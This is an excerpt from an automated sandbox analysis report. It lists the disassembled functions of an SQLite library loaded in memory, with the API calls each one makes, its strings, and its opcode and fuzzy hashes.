                                                                                                                                            • sqlite3_result_text64.SQLITE3 ref: 61E23E6F
                                                                                                                                            • sqlite3_result_blob64.SQLITE3 ref: 61E23EC9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_value_int$sqlite3_result_blob64sqlite3_result_text64sqlite3_value_blobsqlite3_value_bytessqlite3_value_text
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3992148849-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_malloc$memcmpsqlite3_freesqlite3_realloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1984881590-0
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E41023
                                                                                                                                              • Part of subcall function 61E13C8E: sqlite3_mutex_try.SQLITE3(?,00000000,?,61E13CF0), ref: 61E13C2E
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E4103C
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E4114D
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E4150C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2068833801-0
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_free$sqlite3_malloc64sqlite3_mprintf$sqlite3_snprintf$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                                                                                                                            • String ID: .$sqlite3_extension_init$te3_$xa
                                                                                                                                            • API String ID: 2803375525-424482150
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_is_nt
                                                                                                                                            • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                                                                            • API String ID: 3752053736-2111127023
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_stricmp.SQLITE3 ref: 61E2454E
                                                                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 61E2455A
                                                                                                                                            • sqlite3_value_int.SQLITE3 ref: 61E24567
                                                                                                                                            • sqlite3_stricmp.SQLITE3 ref: 61E2458F
                                                                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 61E2459B
                                                                                                                                            • sqlite3_value_int.SQLITE3 ref: 61E245AA
                                                                                                                                            • sqlite3_stricmp.SQLITE3 ref: 61E245CA
                                                                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 61E245D6
                                                                                                                                            • sqlite3_value_int.SQLITE3 ref: 61E245E5
                                                                                                                                            • sqlite3_stricmp.SQLITE3 ref: 61E24611
                                                                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 61E2461D
                                                                                                                                            • sqlite3_value_int.SQLITE3 ref: 61E2462B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_stricmpsqlite3_value_intsqlite3_value_numeric_type
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2723203140-0
                                                                                                                                            • Opcode ID: 3795cbae6c260a60e902fc88a9fc257c6be7c5d9693a9bc884f1f4f58bea1516
                                                                                                                                            • Instruction ID: 7649e02206c548833b93250ede4b9a31858c656497000684f2159c33148b283b
                                                                                                                                            • Opcode Fuzzy Hash: 3795cbae6c260a60e902fc88a9fc257c6be7c5d9693a9bc884f1f4f58bea1516
                                                                                                                                            • Instruction Fuzzy Hash: 3B4118B4908B46CBD720AF65899126EBBF4FF8475CF71C92EC8868B304E734D4528B41
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E179B6
                                                                                                                                            • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21778), ref: 61E179EA
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17B32
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17B3F
                                                                                                                                            • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17BC4
                                                                                                                                            • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21778), ref: 61E17BEA
                                                                                                                                            • sqlite3_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17C0C
                                                                                                                                            • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17C11
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17CE5
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17CF0
                                                                                                                                            • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17D0C
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17D21
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17D35
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_config$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                                                                            • String ID: @6a
                                                                                                                                            • API String ID: 1590227068-3141242769
                                                                                                                                            • Opcode ID: f5005043ba44dfdd3449d948017c6ec10384b408c65f325120fa883d2d97e120
                                                                                                                                            • Instruction ID: bc32719ed3ff1c89fd21ada1ff94782bfeb103e4cb28331d7a73d17d67bdccf6
                                                                                                                                            • Opcode Fuzzy Hash: f5005043ba44dfdd3449d948017c6ec10384b408c65f325120fa883d2d97e120
                                                                                                                                            • Instruction Fuzzy Hash: 86914C71D98A058FEF408FA8C44935D76F2BBCB709F248429C4049B3A4E779C9D5CB91
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_result_value
                                                                                                                                            • String ID: NULL
                                                                                                                                            • API String ID: 336169149-324932091
                                                                                                                                            • Opcode ID: a8165ed0734e617a3eb7d2e186e12fde092656e4a1aa6a645e7fab47ee6be10b
                                                                                                                                            • Instruction ID: d08389f3815a2e7e9e93c97d071f744434c803dde923877aa3eca0c125ef2f9d
                                                                                                                                            • Opcode Fuzzy Hash: a8165ed0734e617a3eb7d2e186e12fde092656e4a1aa6a645e7fab47ee6be10b
                                                                                                                                            • Instruction Fuzzy Hash: C761E270948386CFD7019F68C9A43A9BFE2AF85318F28C96CE4C88B395D735C845CB02
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2313487548-0
                                                                                                                                            • Opcode ID: cc8bbecdeb9c1dfda9548ace6e0444fd38f1078339e74ce32c513f6c2a7c387e
                                                                                                                                            • Instruction ID: c2f72618cc6c0f7f802301503beadb74b7d76ecd6ef94983025737cd66d22810
                                                                                                                                            • Opcode Fuzzy Hash: cc8bbecdeb9c1dfda9548ace6e0444fd38f1078339e74ce32c513f6c2a7c387e
                                                                                                                                            • Instruction Fuzzy Hash: 601186B4604B458BCB40EFB8C0C4419BBE4EF88325FA2C99DDC998B346E734D8A18F55
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcmpsqlite3_value_text$sqlite3_freesqlite3_result_textsqlite3_value_bytes
                                                                                                                                            • String ID: t6a$x6a
                                                                                                                                            • API String ID: 3386002893-961901875
                                                                                                                                            • Opcode ID: 087c252f6a6034a36f693b487c6f517c5ab180425775e666bca1c97750164f84
                                                                                                                                            • Instruction ID: 6af5fefa62bd0083cfbc49f6c94c91775fb0b41dd064eb93ab53d6658f66140f
                                                                                                                                            • Opcode Fuzzy Hash: 087c252f6a6034a36f693b487c6f517c5ab180425775e666bca1c97750164f84
                                                                                                                                            • Instruction Fuzzy Hash: 4461AB71A042558FDB01CFA9C0A069DBBF1BF8E714F29C62ED8A9AB391D730D841CB50
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • `OaMingw-w64 runtime failure:, xrefs: 61E01135
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep_amsg_exit
                                                                                                                                            • String ID: `OaMingw-w64 runtime failure:
                                                                                                                                            • API String ID: 1015461914-1118873892
                                                                                                                                            • Opcode ID: b64c55eeb781da2828cf949bf5f5c709f9373df9cca3e1fcf598b46e8e3d2edf
                                                                                                                                            • Instruction ID: c771c8b00231f251dfe49cf79caec3f0b220d640a5060c235311dcaf4b0d618f
                                                                                                                                            • Opcode Fuzzy Hash: b64c55eeb781da2828cf949bf5f5c709f9373df9cca3e1fcf598b46e8e3d2edf
                                                                                                                                            • Instruction Fuzzy Hash: F5419CB0A556418BEB00AFE8D58432A7AF1FFC634DF25C92ED5888B351D775C890CB92
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_freesqlite3_malloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 423083942-0
                                                                                                                                            • Opcode ID: 377435d3fa47cca39a97c056bce5a2df502776b593b7c3e7010ba10327ec197e
                                                                                                                                            • Instruction ID: 4ccdfbaace8c2cfd2fa90fb703118cd59a5cb72861080560bccf724acfef8ec6
                                                                                                                                            • Opcode Fuzzy Hash: 377435d3fa47cca39a97c056bce5a2df502776b593b7c3e7010ba10327ec197e
                                                                                                                                            • Instruction Fuzzy Hash: BA02D0B4A09209CFDB04CFA8D581E8EBBF1BF48314F258559E855AB359D730E842DFA0
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_value_text.SQLITE3 ref: 61E24D7F
                                                                                                                                            • sqlite3_result_error_toobig.SQLITE3 ref: 61E24E60
                                                                                                                                            • sqlite3_result_error_nomem.SQLITE3 ref: 61E24E86
                                                                                                                                            • sqlite3_snprintf.SQLITE3 ref: 61E25102
                                                                                                                                            • sqlite3_snprintf.SQLITE3 ref: 61E2512F
                                                                                                                                            • sqlite3_snprintf.SQLITE3 ref: 61E25139
                                                                                                                                            • sqlite3_snprintf.SQLITE3 ref: 61E2519F
                                                                                                                                            • sqlite3_result_text.SQLITE3 ref: 61E252C2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_snprintf$sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2444656285-0
                                                                                                                                            • Opcode ID: c30c6085cec16f445bc319ee7301202f4a7aa7cb8187d7f2ddb921c8b4b05c2e
                                                                                                                                            • Instruction ID: 7143cd1c6daae9501e903754e089939c502a95add7c740cb93a1c2c7af09ad12
                                                                                                                                            • Opcode Fuzzy Hash: c30c6085cec16f445bc319ee7301202f4a7aa7cb8187d7f2ddb921c8b4b05c2e
                                                                                                                                            • Instruction Fuzzy Hash: 09E1607594835ACFEB20CF58C890799BBF1BF46304F65C49AE8985B344D734D9868F42
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: strncmp$sqlite3_realloc
                                                                                                                                            • String ID: "$[$f$n$t${
                                                                                                                                            • API String ID: 376036412-1714737523
                                                                                                                                            • Opcode ID: 0a090424efaf681855bf54a9f65f68632b10137e9abe9e860fe499f0a4d45a09
                                                                                                                                            • Instruction ID: 64de3516b4d30995faa39bb53a21e125637e37efe03b30567cf8edfdb90223b9
                                                                                                                                            • Opcode Fuzzy Hash: 0a090424efaf681855bf54a9f65f68632b10137e9abe9e860fe499f0a4d45a09
                                                                                                                                            • Instruction Fuzzy Hash: A4B1B678A4C2898FD721CF68C48A7D9BBF27B4931CF24C559D4948B39AC739D846CB11
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 1503958624-2766056989
                                                                                                                                            • Opcode ID: aafc3fdb3a8ed305672a2b5ae5c497fbf1d62d15941817515036867c45c2ed7b
                                                                                                                                            • Instruction ID: a08da7ce96221e979bcff68011cc15f3a87dea45d4d45cb97f5cddee0d0395e0
                                                                                                                                            • Opcode Fuzzy Hash: aafc3fdb3a8ed305672a2b5ae5c497fbf1d62d15941817515036867c45c2ed7b
                                                                                                                                            • Instruction Fuzzy Hash: 794113B5915B028FD740DF68C584A1ABBF0BF89354F69C91DE89D97350EB34E8848B82
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_value_blobsqlite3_value_bytessqlite3_value_text$memcmp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2264764126-0
                                                                                                                                            • Opcode ID: f4a24cb1987a28c645576bbc95223493ff28be2bb4834aafcad62c9a7c2cd125
                                                                                                                                            • Instruction ID: 215ca0319befc17eccccbd96179849b19b8a40b42a549c7d043b2059b9d0ea3f
                                                                                                                                            • Opcode Fuzzy Hash: f4a24cb1987a28c645576bbc95223493ff28be2bb4834aafcad62c9a7c2cd125
                                                                                                                                            • Instruction Fuzzy Hash: B7316075A086558BCB04DFA8C59099DBBF1EB8D314F25C42FE8989B300D679EC81CB52
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 61E28068: sqlite3_log.SQLITE3(?,?,?,?,?,61E2811B), ref: 61E280A3
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E28FB2
                                                                                                                                            • sqlite3_value_text16le.SQLITE3 ref: 61E28FC6
                                                                                                                                            • sqlite3_value_text16le.SQLITE3 ref: 61E28FF4
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E29008
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_value_text16le$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                            • String ID: library routine called out of sequence$out of memory
                                                                                                                                            • API String ID: 3568942437-3029887290
                                                                                                                                            • Opcode ID: b24406e808208f8243e280420499638d1bcf540988ee4c103019a5cf0e6243d2
                                                                                                                                            • Instruction ID: e08d8797e383a0ce4221f86d9204bfba6d5c841cf68dc502112f567ed3446540
                                                                                                                                            • Opcode Fuzzy Hash: b24406e808208f8243e280420499638d1bcf540988ee4c103019a5cf0e6243d2
                                                                                                                                            • Instruction Fuzzy Hash: D1015271B043554BD710AFB8C4C0A25BBE4AF44358F25887DDD58CB301EB75CC408791
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_free$sqlite3_logstrcmp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2202632817-0
                                                                                                                                            • Opcode ID: 9f0a3cc0d928783b32e3fcbde51aa750811efdae56e44b17b01cde803bf6f4f5
                                                                                                                                            • Instruction ID: ee1b78a7377f4fe8f1e01a49623c1532a51755f147ad66caafb6251e233fa4c5
                                                                                                                                            • Opcode Fuzzy Hash: 9f0a3cc0d928783b32e3fcbde51aa750811efdae56e44b17b01cde803bf6f4f5
                                                                                                                                            • Instruction Fuzzy Hash: 18F1D374A0525A9FDB45CFA9C480B9DBBF1BF88308F248629E855EB344D734E846DF41
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_msize$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 61E3138C: sqlite3_realloc64.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,61E3147B), ref: 61E313BB
                                                                                                                                              • Part of subcall function 61E08FD1: memcmp.MSVCRT ref: 61E0902B
                                                                                                                                              • Part of subcall function 61E08FD1: memcmp.MSVCRT ref: 61E0908F
                                                                                                                                            • sqlite3_malloc64.SQLITE3 ref: 61E3192B
                                                                                                                                              • Part of subcall function 61E1A1B1: sqlite3_initialize.SQLITE3 ref: 61E1A1BC
                                                                                                                                            • memcmp.MSVCRT ref: 61E319EB
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E31AC9
                                                                                                                                            • sqlite3_log.SQLITE3 ref: 61E31B7A
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcmp$sqlite3_freesqlite3_initializesqlite3_logsqlite3_malloc64sqlite3_realloc64
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_value_text.SQLITE3 ref: 61E23027
                                                                                                                                            • sqlite3_value_text.SQLITE3 ref: 61E23035
                                                                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 61E23042
                                                                                                                                            • sqlite3_value_text.SQLITE3 ref: 61E23070
                                                                                                                                            • sqlite3_result_error.SQLITE3 ref: 61E2309A
                                                                                                                                            • sqlite3_result_int.SQLITE3 ref: 61E230D2
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_value_text$sqlite3_result_errorsqlite3_result_intsqlite3_value_bytes
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_strglob
                                                                                                                                            • String ID: $
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,61E16ABE), ref: 61E16A6D
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,61E16ABE), ref: 61E16A88
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_enter
                                                                                                                                            • String ID: @9a$@9a$@9a
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 61E13C8E: sqlite3_mutex_try.SQLITE3(?,00000000,?,61E13CF0), ref: 61E13C2E
                                                                                                                                            • memcmp.MSVCRT ref: 61E3BA52
                                                                                                                                            • memcmp.MSVCRT ref: 61E3BA8E
                                                                                                                                            • memcmp.MSVCRT ref: 61E3BB0A
                                                                                                                                            • memcmp.MSVCRT ref: 61E3BD14
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcmp$sqlite3_mutex_try
                                                                                                                                            • String ID: 0
                                                                                                                                            • API String ID: 2794522359-4108050209
                                                                                                                                            • Opcode ID: 3ac686300865fe194f72bdd91be57a9ce56ae1785c8d5cbabc28614575de9296
                                                                                                                                            • Instruction ID: 16ba7343736bb527158698b474bbcd3afd71df4d9d6603271a2c87e4fbdf42af
                                                                                                                                            • Opcode Fuzzy Hash: 3ac686300865fe194f72bdd91be57a9ce56ae1785c8d5cbabc28614575de9296
                                                                                                                                            • Instruction Fuzzy Hash: A502BC70E04A698FEB05CFA9C08479DBBF1AFC8308F24C569E8469B395D734E885CB51
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E18465
                                                                                                                                            • sqlite3_malloc.SQLITE3 ref: 61E184FB
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E1842C
                                                                                                                                              • Part of subcall function 61E09B3D: sqlite3_mutex_enter.SQLITE3 ref: 61E09B5C
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E1868A
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_free$sqlite3_mallocsqlite3_mutex_enter
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 165182205-0
                                                                                                                                            • Opcode ID: 16952b67d7732fc4ada51d93540606116d4c71d1be5f29f7f7f9d00a378a9ca7
                                                                                                                                            • Instruction ID: aafd9ec4b20a39cee87902430ba3fa8e06fa1ccb72e96da7a1514644849b8d37
                                                                                                                                            • Opcode Fuzzy Hash: 16952b67d7732fc4ada51d93540606116d4c71d1be5f29f7f7f9d00a378a9ca7
                                                                                                                                            • Instruction Fuzzy Hash: 52A19275D04258CFCB04CFA9D484ADDBBF1BF88314F25852AE859AB348E774A945CF41
                                                                                                                                            APIs
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_strnicmp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1961171630-0
                                                                                                                                            • Opcode ID: 4152a2755d37966d6f30f6a983616001695ced2628f7d588fa17c454228850bc
                                                                                                                                            • Instruction ID: 1cd60eced02e175bcc69efc76f2b3cd0355e64b47221b08c0a6e24e201a49c35
                                                                                                                                            • Opcode Fuzzy Hash: 4152a2755d37966d6f30f6a983616001695ced2628f7d588fa17c454228850bc
                                                                                                                                            • Instruction Fuzzy Hash: 2151B37544968589EB214ED884823A9BFE79F4370FF78D41AD4A48B251C37EC0BA8A53
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E4DB8A), ref: 61E4D908
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E4DB8A), ref: 61E4DA95
                                                                                                                                            • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E4DB8A), ref: 61E4DAA7
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E4DABE
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E4DAC6
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_freesqlite3_mutex_leave$sqlite3_mutex_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2921195555-0
                                                                                                                                            • Opcode ID: d6fb389a4a36b59413c207fac5cbc38a44dbd5d29e5d8592e3f5a13460e77c1a
                                                                                                                                            • Instruction ID: 9331b0756bce0110006757d11a21ca1866651c1f47a768e15edfcfbf6d05531e
                                                                                                                                            • Opcode Fuzzy Hash: d6fb389a4a36b59413c207fac5cbc38a44dbd5d29e5d8592e3f5a13460e77c1a
                                                                                                                                            • Instruction Fuzzy Hash: DB519C78A046428BDB10DF69D88075AB7B2BF94318F29C97CCC99DB305D774E856CB90
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 61E13C8E: sqlite3_mutex_try.SQLITE3(?,00000000,?,61E13CF0), ref: 61E13C2E
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E4D831
                                                                                                                                            • sqlite3_mutex_free.SQLITE3 ref: 61E4D872
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E4D882
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E4D8B1
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E4D8D0
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                                                                            • String ID:
